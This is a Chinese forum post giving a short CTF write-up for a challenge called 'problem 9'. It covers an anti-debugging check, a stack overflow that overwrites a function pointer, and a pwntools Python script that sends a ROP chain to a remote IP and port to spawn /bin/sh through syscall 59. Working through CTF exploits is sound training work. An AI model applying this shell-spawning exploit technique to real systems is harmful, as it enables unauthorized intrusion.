首页
社区
课程
招聘
[原创]第九题 命悬一线 writeup
2020-12-9 19:01 6774

[原创]第九题 命悬一线 writeup

2020-12-9 19:01
6774

比较忙,不能详写了,说下思路

题目最大的难点应该是打印的那句话

Please run in docker!

还有这个

第二天下好安装下来发现运行程序还是没得输入的地方

傻傻的安装好环境,运行还是

Please run in docker!

不禁感慨作者有点阴险

然后拖进去仔细调仔细看发现应该是附加上才有输出,感觉像是作者发错程序了,ptrace那应该是等于0进入异常吧


栈溢出,然后覆盖后面得函数指针

然后执行syscall那个地方rdx,rcx都得等于0

所以执行两次就能满足条件

一句话就能搞定了

#!/usr/bin/env python2

from pwn import *
import sys
import os

host, port = "121.36.145.157",9999
local = 0

if local:

    p = process('./pwn1')
else:
    p = remote(host, port)


context.arch = 'amd64'
#t=input()
payload='/bin/sh\x00'+'A'*0x10+p64(0x4016CA)
payload=payload.ljust(0x78,'A')+p64(0x40185A)
payload=payload.ljust(0xa0,'A')
payload+=p64(0x6020C0)+p64(512)
payload+=p64(0x4017e3)+p64(0x401863)+p64(59)+p64(0x401861)+p64(0x6020C0)+p64(0x0)+p64(0x4017CC)+p64(0x4017e3)+p64(0x401863)+p64(59)+p64(0x401861)+p64(0x6020C0)+p64(0x0)+p64(0x4017CC)
payload=payload.ljust(512,'A')
p.send(payload)
p.interactive()



[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

最后于 2020-12-9 19:05 被大帅锅编辑 ,原因:
收藏
点赞0
打赏
分享
最新回复 (1)
雪    币: 83429
活跃值: (198485)
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
linhanshi 2020-12-9 19:06
2
0
支持。
游客
登录 | 注册 方可回帖
返回